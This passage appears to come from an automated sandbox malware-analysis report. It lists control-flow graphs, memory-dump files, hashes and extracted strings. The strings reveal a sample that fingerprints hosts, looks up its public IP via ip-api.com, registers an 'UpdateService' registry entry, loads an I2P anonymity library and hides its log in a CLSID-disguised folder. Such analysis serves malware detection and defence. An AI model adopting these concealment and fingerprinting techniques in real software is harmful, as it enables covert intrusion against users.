495 7ffe0e16c70f-7ffe0e16c714 489->495 496 7ffe0e16c5df-7ffe0e16c5e4 489->496 498 7ffe0e16c59b-7ffe0e16c5a0 491->498 499 7ffe0e16c6e7-7ffe0e16c6ec 491->499 492->415 493->415 494->415 495->415 496->415 498->415 499->415 500->477 502 7ffe0e16c76b 500->502 501->470 502->470
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
    • API String ID: 3828489143-883582248
    • Opcode ID: f99a8acc4a9a33fd0079e8d835f9253dc811df7188b8601c8e2c5d1f47ab0a84
    • Instruction ID: 9a21009a62d14b994a68044f21107c697b3decab4d702d90cc32ec2586b63d09
    • Opcode Fuzzy Hash: f99a8acc4a9a33fd0079e8d835f9253dc811df7188b8601c8e2c5d1f47ab0a84
    • Instruction Fuzzy Hash: EBD1AD22E0C65B81FB209B99E8443B9A2A0AF48B54F554037CDDE573B2DF2DE88487C1

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 505 7ffe0eb444cc-7ffe0eb444e6 call 7ffe0eb44df4 508 7ffe0eb44a08 505->508 509 7ffe0eb444ec-7ffe0eb44501 call 7ffe0eb44d73 505->509 512 7ffe0eb44a1c-7ffe0eb44a21 508->512 513 7ffe0eb44503-7ffe0eb44531 509->513 514 7ffe0eb44557 509->514 515 7ffe0eb44569-7ffe0eb44580 call 7ffe0eb49dc2 512->515 523 7ffe0eb44533-7ffe0eb44538 513->523 524 7ffe0eb4453a-7ffe0eb44555 call 7ffe0eb49dc2 513->524 516 7ffe0eb4455c-7ffe0eb44567 FreeLibrary 514->516 520 7ffe0eb44585-7ffe0eb44592 515->520 516->515 519 7ffe0eb44593-7ffe0eb445cc GetNativeSystemInfo GetWindowsDirectoryA 516->519 521 7ffe0eb446b0-7ffe0eb446d3 call 7ffe0eb49dc2 519->521 522 7ffe0eb445d2-7ffe0eb445f3 GetLastError call 7ffe0eb49dc2 519->522 521->515 533 7ffe0eb446d9-7ffe0eb4470f call 7ffe0eb43382 521->533 531 7ffe0eb445f5 522->531 532 7ffe0eb44613-7ffe0eb44619 522->532 523->516 524->516 534 7ffe0eb44609-7ffe0eb4460e 531->534 535 7ffe0eb445f7-7ffe0eb44604 531->535 532->512 536 7ffe0eb4461f-7ffe0eb44625 532->536 545 7ffe0eb447c0-7ffe0eb447dc call 7ffe0eb49dc2 533->545 546 7ffe0eb44715-7ffe0eb44717 533->546 534->515 535->534 538 7ffe0eb4465e-7ffe0eb44664 536->538 539 7ffe0eb44627-7ffe0eb4462a 536->539 541 7ffe0eb44a44-7ffe0eb44a49 538->541 542 7ffe0eb4466a-7ffe0eb44670 538->542 543 7ffe0eb44648-7ffe0eb4464e 539->543 544 7ffe0eb4462c-7ffe0eb4462f 539->544 541->515 547 7ffe0eb44a4e-7ffe0eb44a53 542->547 548 7ffe0eb44676-7ffe0eb4467c 542->548 553 7ffe0eb44654-7ffe0eb44659 543->553 554 7ffe0eb44a3a-7ffe0eb44a3f 543->554 550 7ffe0eb44635-7ffe0eb44638 544->550 551 7ffe0eb44a26-7ffe0eb44a2b 544->551 557 7ffe0eb447e1 545->557 546->515 552 7ffe0eb4471d-7ffe0eb4477a GetVolumeInformationA 546->552 547->515 555 7ffe0eb4467e-7ffe0eb44683 548->555 556 7ffe0eb44688-7ffe0eb4468d 548->556 558 7ffe0eb44a30-7ffe0eb44a35 550->558 559 7ffe0eb4463e-7ffe0eb44643 550->559 551->515 560 7ffe0eb44780-7ffe0eb447a6 GetLastError call 7ffe0eb49dc2 552->560 561 7ffe0eb44877-7ffe0eb448a9 call 7ffe0eb49dc2 552->561 553->515 554->515 555->515 556->515 557->546 558->515 559->515 568 7ffe0eb447a8 560->568 569 7ffe0eb447e6-7ffe0eb447ec 560->569 566 7ffe0eb448bd-7ffe0eb448c4 561->566 567 7ffe0eb448ab-7ffe0eb448b7 strlen 561->567 573 7ffe0eb448c8-7ffe0eb44925 call 7ffe0eb49dc2 566->573 567->566 572 7ffe0eb44989-7ffe0eb4498d 567->572 570 7ffe0eb4492f-7ffe0eb44934 568->570 571 7ffe0eb447ae-7ffe0eb447bb 568->571 574 7ffe0eb44943-7ffe0eb44948 569->574 575 7ffe0eb447f2 569->575 570->515 571->545 572->566 576 7ffe0eb44993-7ffe0eb44997 572->576 581 7ffe0eb4492a 573->581 574->515 578 7ffe0eb447f4-7ffe0eb447f7 575->578 579 7ffe0eb4482b-7ffe0eb44831 575->579 576->566 580 7ffe0eb4499d-7ffe0eb449d0 _errno call 7ffe0eb51098 _errno 576->580 582 7ffe0eb44815-7ffe0eb4481b 578->582 583 7ffe0eb447f9-7ffe0eb447fc 578->583 584 7ffe0eb44837-7ffe0eb4483d 579->584 585 7ffe0eb4496b-7ffe0eb44970 579->585 598 7ffe0eb449e0-7ffe0eb44a03 _errno call 7ffe0eb49dc2 580->598 599 7ffe0eb449d2-7ffe0eb449d5 580->599 581->520 589 7ffe0eb44961-7ffe0eb44966 582->589 590 7ffe0eb44821-7ffe0eb44826 582->590 587 7ffe0eb44802-7ffe0eb44805 583->587 588 7ffe0eb4494d-7ffe0eb44952 583->588 591 7ffe0eb44975-7ffe0eb4497a 584->591 592 7ffe0eb44843-7ffe0eb44849 584->592 585->515 596 7ffe0eb44957-7ffe0eb4495c 587->596 597 7ffe0eb4480b-7ffe0eb44810 587->597 588->515 589->515 590->515 591->515 593 7ffe0eb4497f-7ffe0eb44984 592->593 594 7ffe0eb4484f-7ffe0eb44854 592->594 593->515 594->515 596->515 597->515 598->566 599->573 600 7ffe0eb449db 599->600 600->566
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
    • API String ID: 3828489143-883582248
    • Opcode ID: b5fd4e9562417732fdaa0dbba0e05c9de88ec29756765ebe4ed71ec975986126
    • Instruction ID: 0d3cb7bae7c722bdea4c8a160afb3a3c755e7bf65431e18453957106969c38ed
    • Opcode Fuzzy Hash: b5fd4e9562417732fdaa0dbba0e05c9de88ec29756765ebe4ed71ec975986126
    • Instruction Fuzzy Hash: 2ED16CA2E0C76381FB709F58E8403B966A0EF80B54F550132D9EE176B0DE2CE894CF81

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 936 7ff6ef6528fc-7ff6ef652916 call 7ff6ef652304 939 7ff6ef65291c-7ff6ef652931 call 7ff6ef652283 936->939 940 7ff6ef652e38 936->940 944 7ff6ef652987 939->944 945 7ff6ef652933-7ff6ef652961 939->945 943 7ff6ef652e4c-7ff6ef652e51 940->943 946 7ff6ef652999-7ff6ef6529b0 call 7ff6ef652ef2 943->946 947 7ff6ef65298c-7ff6ef652997 FreeLibrary 944->947 952 7ff6ef65296a-7ff6ef652985 call 7ff6ef652ef2 945->952 953 7ff6ef652963-7ff6ef652968 945->953 951 7ff6ef6529b5-7ff6ef6529c2 946->951 947->946 950 7ff6ef6529c3-7ff6ef6529fc GetNativeSystemInfo GetWindowsDirectoryA 947->950 954 7ff6ef652a02-7ff6ef652a23 GetLastError call 7ff6ef652ef2 950->954 955 7ff6ef652ae0-7ff6ef652b03 call 7ff6ef652ef2 950->955 952->947 953->947 962 7ff6ef652a43-7ff6ef652a49 954->962 963 7ff6ef652a25 954->963 955->946 964 7ff6ef652b09-7ff6ef652b3f call 7ff6ef659242 955->964 962->943 967 7ff6ef652a4f-7ff6ef652a55 962->967 965 7ff6ef652a27-7ff6ef652a34 963->965 966 7ff6ef652a39-7ff6ef652a3e 963->966 974 7ff6ef652b45-7ff6ef652b47 964->974 975 7ff6ef652bf0-7ff6ef652c0c call 7ff6ef652ef2 964->975 965->966 966->946 969 7ff6ef652a57-7ff6ef652a5a 967->969 970 7ff6ef652a8e-7ff6ef652a94 967->970 972 7ff6ef652a5c-7ff6ef652a5f 969->972 973 7ff6ef652a78-7ff6ef652a7e 969->973 976 7ff6ef652a9a-7ff6ef652aa0 970->976 977 7ff6ef652e74-7ff6ef652e79 970->977 979 7ff6ef652e56-7ff6ef652e5b 972->979 980 7ff6ef652a65-7ff6ef652a68 972->980 982 7ff6ef652e6a-7ff6ef652e6f 973->982 983 7ff6ef652a84-7ff6ef652a89 973->983 974->946 981 7ff6ef652b4d-7ff6ef652baa GetVolumeInformationA 974->981 988 7ff6ef652c11 975->988 984 7ff6ef652aa6-7ff6ef652aac 976->984 985 7ff6ef652e7e-7ff6ef652e83 976->985 977->946 979->946 989 7ff6ef652a6e-7ff6ef652a73 980->989 990 7ff6ef652e60-7ff6ef652e65 980->990 991 7ff6ef652ca7-7ff6ef652cd9 call 7ff6ef652ef2 981->991 992 7ff6ef652bb0-7ff6ef652bd6 GetLastError call 7ff6ef652ef2 981->992 982->946 983->946 986 7ff6ef652ab8-7ff6ef652abd 984->986 987 7ff6ef652aae-7ff6ef652ab3 984->987 985->946 986->946 987->946 988->974 989->946 990->946 997 7ff6ef652cdb-7ff6ef652ce7 strlen 991->997 998 7ff6ef652ced-7ff6ef652cf4 991->998 999 7ff6ef652c16-7ff6ef652c1c 992->999 1000 7ff6ef652bd8 992->1000 997->998 1001 7ff6ef652db9-7ff6ef652dbd 997->1001 1002 7ff6ef652cf8-7ff6ef652d55 call 7ff6ef652ef2 998->1002 1003 7ff6ef652c22 999->1003 1004 7ff6ef652d73-7ff6ef652d78 999->1004 1005 7ff6ef652bde-7ff6ef652beb 1000->1005 1006 7ff6ef652d5f-7ff6ef652d64 1000->1006 1001->998 1007 7ff6ef652dc3-7ff6ef652dc7 1001->1007 1012 7ff6ef652d5a 1002->1012 1009 7ff6ef652c5b-7ff6ef652c61 1003->1009 1010 7ff6ef652c24-7ff6ef652c27 1003->1010 1004->946 1005->975 1006->946 1007->998 1011 7ff6ef652dcd-7ff6ef652e00 _errno call 7ff6ef65e4b0 _errno 1007->1011 1015 7ff6ef652d9b-7ff6ef652da0 1009->1015 1016 7ff6ef652c67-7ff6ef652c6d 1009->1016 1013 7ff6ef652c29-7ff6ef652c2c 1010->1013 1014 7ff6ef652c45-7ff6ef652c4b 1010->1014 1029 7ff6ef652e02-7ff6ef652e05 1011->1029 1030 7ff6ef652e10-7ff6ef652e33 _errno call 7ff6ef652ef2 1011->1030 1012->951 1018 7ff6ef652d7d-7ff6ef652d82 1013->1018 1019 7ff6ef652c32-7ff6ef652c35 1013->1019 1020 7ff6ef652d91-7ff6ef652d96 1014->1020 1021 7ff6ef652c51-7ff6ef652c56 1014->1021 1015->946 1022 7ff6ef652c73-7ff6ef652c79 1016->1022 1023 7ff6ef652da5-7ff6ef652daa 1016->1023 1018->946 1025 7ff6ef652c3b-7ff6ef652c40 1019->1025 1026 7ff6ef652d87-7ff6ef652d8c 1019->1026 1020->946 1021->946 1027 7ff6ef652daf-7ff6ef652db4 1022->1027 1028 7ff6ef652c7f-7ff6ef652c84 1022->1028 1023->946 1025->946 1026->946 1027->946 1028->946 1029->1002 1031 7ff6ef652e0b 1029->1031 1030->998 1031->998
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
    • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
    • API String ID: 3828489143-3798070276
    • Opcode ID: ffc509cf212cb316355f02b237155ff1aacdd6f990e522e90fbe1568e07fe90a
    • Instruction ID: 9d1c9713298b5e3d6fe9461287b3b40114838231a49a0ecc297ce874b6864fb8
    • Opcode Fuzzy Hash: ffc509cf212cb316355f02b237155ff1aacdd6f990e522e90fbe1568e07fe90a
    • Instruction Fuzzy Hash: 2FD18F63E1C65387FB208795E4803B92358AF40754F160936D94EE7793DE2FE984A38B

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1034 7ffe126dbc77-7ffe126dbc97 1035 7ffe126dbc99-7ffe126dbca1 1034->1035 1036 7ffe126dbd05-7ffe126dbd0d 1034->1036 1039 7ffe126dbca3-7ffe126dbcaa 1035->1039 1040 7ffe126dbcb0-7ffe126dbcb8 1035->1040 1037 7ffe126dbd0f-7ffe126dbd14 1036->1037 1038 7ffe126dbd20-7ffe126dbd36 call 7ffe126d689b 1036->1038 1041 7ffe126dbd3b-7ffe126dbd40 1037->1041 1042 7ffe126dbd16-7ffe126dbd1b 1037->1042 1048 7ffe126dc38c-7ffe126dc39d 1038->1048 1039->1040 1044 7ffe126dc0b3-7ffe126dc0cd call 7ffe126d689b 1039->1044 1045 7ffe126dc387 1040->1045 1046 7ffe126dbcbe-7ffe126dbcc6 1040->1046 1050 7ffe126dbd42-7ffe126dbd48 1041->1050 1051 7ffe126dbd6f-7ffe126dbeba call 7ffe126d22f5 call 7ffe126d7400 call 7ffe126d5ec9 1041->1051 1042->1048 1044->1040 1060 7ffe126dc0d3-7ffe126dc0db 1044->1060 1045->1048 1052 7ffe126dbcdb-7ffe126dbce6 1046->1052 1053 7ffe126dbcc8-7ffe126dbccf 1046->1053 1050->1051 1055 7ffe126dbd4a-7ffe126dbd6a 1050->1055 1092 7ffe126dc039-7ffe126dc06e call 7ffe126d3805 1051->1092 1093 7ffe126dbec0-7ffe126dbeee call 7ffe126dd3f2 1051->1093 1058 7ffe126dbcec-7ffe126dbcf5 1052->1058 1059 7ffe126dc39e-7ffe126dc3a3 1052->1059 1053->1052 1057 7ffe126dbcd1-7ffe126dbcd9 1053->1057 1055->1048 1057->1052 1057->1058 1062 7ffe126dbcfb-7ffe126dbd00 1058->1062 1063 7ffe126dc22d-7ffe126dc253 1058->1063 1059->1048 1066 7ffe126dc167-7ffe126dc182 call 7ffe126d689b call 7ffe126db910 1060->1066 1067 7ffe126dc0e1-7ffe126dc0f2 1060->1067 1062->1048 1064 7ffe126dc259-7ffe126dc260 1063->1064 1065 7ffe126dc3a5-7ffe126dc3aa 1063->1065 1069 7ffe126dc262-7ffe126dc26c 1064->1069 1070 7ffe126dc26f-7ffe126dc295 GetProcessHeap HeapAlloc 1064->1070 1065->1048 1066->1048 1071 7ffe126dc10d-7ffe126dc116 1067->1071 1072 7ffe126dc0f4-7ffe126dc10b 1067->1072 1069->1070 1076 7ffe126dc297-7ffe126dc2d9 memcpy call 7ffe126d9100 1070->1076 1077 7ffe126dc309-7ffe126dc324 call 7ffe126d77a2 1070->1077 1071->1066 1078 7ffe126dc118-7ffe126dc120 1071->1078 1072->1066 1072->1071 1096 7ffe126dc378-7ffe126dc37b 1076->1096 1097 7ffe126dc2df 1076->1097 1077->1048 1082 7ffe126dc122-7ffe126dc129 1078->1082 1083 7ffe126dc135-7ffe126dc140 1078->1083 1082->1083 1088 7ffe126dc12b-7ffe126dc133 1082->1088 1089 7ffe126dc187 call 7ffe126db9f4 1083->1089 1090 7ffe126dc142-7ffe126dc14a 1083->1090 1088->1083 1088->1090 1102 7ffe126dc18c-7ffe126dc191 1089->1102 1099 7ffe126dc14c-7ffe126dc162 call 7ffe126d689b 1090->1099 1100 7ffe126dc196-7ffe126dc1b0 call 7ffe126d689b 1090->1100 1092->1093 1114 7ffe126dc074-7ffe126dc087 call 7ffe126dea90 1092->1114 1108 7ffe126dbefe-7ffe126dbf0a call 7ffe126d68e2 1093->1108 1109 7ffe126dbef0-7ffe126dbef8 1093->1109 1106 7ffe126dc33a-7ffe126dc33c 1096->1106 1104 7ffe126dc2e4-7ffe126dc2e7 1097->1104 1099->1048 1120 7ffe126dc1bc-7ffe126dc228 call 7ffe126d22f5 call 7ffe126d689b call 7ffe126d61a2 1100->1120 1121 7ffe126dc1b2-7ffe126dc1b7 1100->1121 1102->1048 1104->1048 1113 7ffe126dc2ed-7ffe126dc304 GetProcessHeap HeapFree 1104->1113 1110 7ffe126dc34d-7ffe126dc35c call 7ffe126d917d 1106->1110 1111 7ffe126dc33e-7ffe126dc346 1106->1111 1128 7ffe126dbf0c-7ffe126dbf21 1108->1128 1129 7ffe126dbf29-7ffe126dbf3f call 7ffe126d6a68 1108->1129 1109->1108 1116 7ffe126dc08c-7ffe126dc0ae memcpy 1109->1116 1110->1097 1130 7ffe126dc35e-7ffe126dc36c call 7ffe126dbc0e 1110->1130 1111->1110 1117 7ffe126dc348-7ffe126dc34b 1111->1117 1113->1048 1114->1093 1116->1108 1117->1110 1123 7ffe126dc326-7ffe126dc336 call 7ffe126d91ee 1117->1123 1120->1048 1121->1048 1123->1106 1128->1129 1140 7ffe126dbf64-7ffe126dbfab call 7ffe126d9370 1129->1140 1141 7ffe126dbf41-7ffe126dbf5d 1129->1141 1142 7ffe126dc37d-7ffe126dc382 1130->1142 1143 7ffe126dc36e-7ffe126dc373 1130->1143 1148 7ffe126dbfad-7ffe126dbfb5 1140->1148 1149 7ffe126dbfdf-7ffe126dbfe7 1140->1149 1141->1140 1142->1104 1143->1104 1148->1149 1152 7ffe126dbfb7-7ffe126dbfd2 call 7ffe126d1290 1148->1152 1150 7ffe126dbfe9-7ffe126dbffa GetProcessHeap HeapFree 1149->1150 1151 7ffe126dc000-7ffe126dc034 call 7ffe126d61a2 1149->1151 1150->1151 1151->1048 1152->1149 1157 7ffe126dbfd4-7ffe126dbfd8 1152->1157 1157->1149
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID:
    • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$Referer$SYSTEM\CurrentControlSet\Services\UpdateService\Parameters$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$ip-api.com$last-patch$mem_alloc
    • API String ID: 0-4235120829
    • Opcode ID: b111abc97e8844963aa1c4367b10b26ec1e4f214c1298f9732ba1d066dde872b
    • Instruction ID: d46986ba588fec433de7ac57b6a541478aa85c2f74e2a98bc7c7700379b5ba5f
    • Opcode Fuzzy Hash: b111abc97e8844963aa1c4367b10b26ec1e4f214c1298f9732ba1d066dde872b
    • Instruction Fuzzy Hash: A2127061A08F8E87EA60CB1AEC403B963A4EB84764F504276DA9D477F9DFBCE445C740

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: strlen$strcat$HandleLibraryLoadModule
    • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
    • API String ID: 1893813203-492052463
    • Opcode ID: 57d5711ee8427bd87ee575909a0cf410c33c3c401ab1fb1fa258222903a299b0
    • Instruction ID: f19ecf81e1923d2108b5661a85aaa431a10e205d9be934d4a033093310cc85ff
    • Opcode Fuzzy Hash: 57d5711ee8427bd87ee575909a0cf410c33c3c401ab1fb1fa258222903a299b0
    • Instruction Fuzzy Hash: 04719F3161CF8A82EB219B16E9503FE6395EB84790F440171DA8D4B7E9EFBCD905C780
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
    • API String ID: 3395718042-190452282
    • Opcode ID: c05900a8507ee543a62eed4c6a185f04896fe9d0da75e948d3abfafb94edaaae
    • Instruction ID: dd9eb3b6ca7b60ab503c85f840b7aed3102538302fd654b053c2b8eaa8b966c6
    • Opcode Fuzzy Hash: c05900a8507ee543a62eed4c6a185f04896fe9d0da75e948d3abfafb94edaaae
    • Instruction Fuzzy Hash: A5513E50E0CE03DDFA109B13A4903BC5652AF75764F5002F2D92EB7AB2DE6DA9C58319

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1200 7ffe0e13427c-7ffe0e1342a4 InitializeCriticalSectionAndSpinCount 1201 7ffe0e1343d0-7ffe0e1343f1 GetLastError call 7ffe0e1340d2 1200->1201 1202 7ffe0e1342aa-7ffe0e1342de call 7ffe0e132700 call 7ffe0e13ce6b 1200->1202 1207 7ffe0e134412-7ffe0e134418 1201->1207 1208 7ffe0e1343f3 1201->1208 1215 7ffe0e1343a9-7ffe0e1343c1 call 7ffe0e1340d2 1202->1215 1216 7ffe0e1342e4-7ffe0e1342fb strlen 1202->1216 1213 7ffe0e13441e-7ffe0e134424 1207->1213 1214 7ffe0e1344db 1207->1214 1210 7ffe0e1344d1-7ffe0e1344d6 1208->1210 1211 7ffe0e1343f9-7ffe0e134406 1208->1211 1210->1215 1211->1207 1217 7ffe0e134450-7ffe0e134453 1213->1217 1218 7ffe0e134426-7ffe0e13442c 1213->1218 1221 7ffe0e1344e5-7ffe0e1344ea 1214->1221 1231 7ffe0e1343c6-7ffe0e1343cf 1215->1231 1225 7ffe0e134313-7ffe0e134316 1216->1225 1226 7ffe0e1342fd-7ffe0e134300 1216->1226 1223 7ffe0e134455-7ffe0e134458 1217->1223 1224 7ffe0e13446d-7ffe0e134473 1217->1224 1219 7ffe0e134432-7ffe0e134438 1218->1219 1220 7ffe0e1344f9-7ffe0e1344fe 1218->1220 1229 7ffe0e13443e-7ffe0e134444 1219->1229 1230 7ffe0e134503-7ffe0e134508 1219->1230 1220->1215 1221->1215 1232 7ffe0e1344c7 1223->1232 1233 7ffe0e13445a-7ffe0e13445d 1223->1233 1234 7ffe0e1344ef 1224->1234 1235 7ffe0e134475-7ffe0e13447a 1224->1235 1227 7ffe0e134338-7ffe0e134381 strlen fopen 1225->1227 1228 7ffe0e134318-7ffe0e134332 strcat strlen 1225->1228 1226->1225 1236 7ffe0e134302-7ffe0e13430f strlen 1226->1236 1237 7ffe0e134387-7ffe0e1343a3 call 7ffe0e1340d2 1227->1237 1238 7ffe0e13449d-7ffe0e1344b8 call 7ffe0e1340d2 1227->1238 1228->1227 1239 7ffe0e13447f-7ffe0e134484 1229->1239 1240 7ffe0e134446-7ffe0e13444b 1229->1240 1230->1215 1232->1210 1233->1221 1241 7ffe0e134463-7ffe0e134468 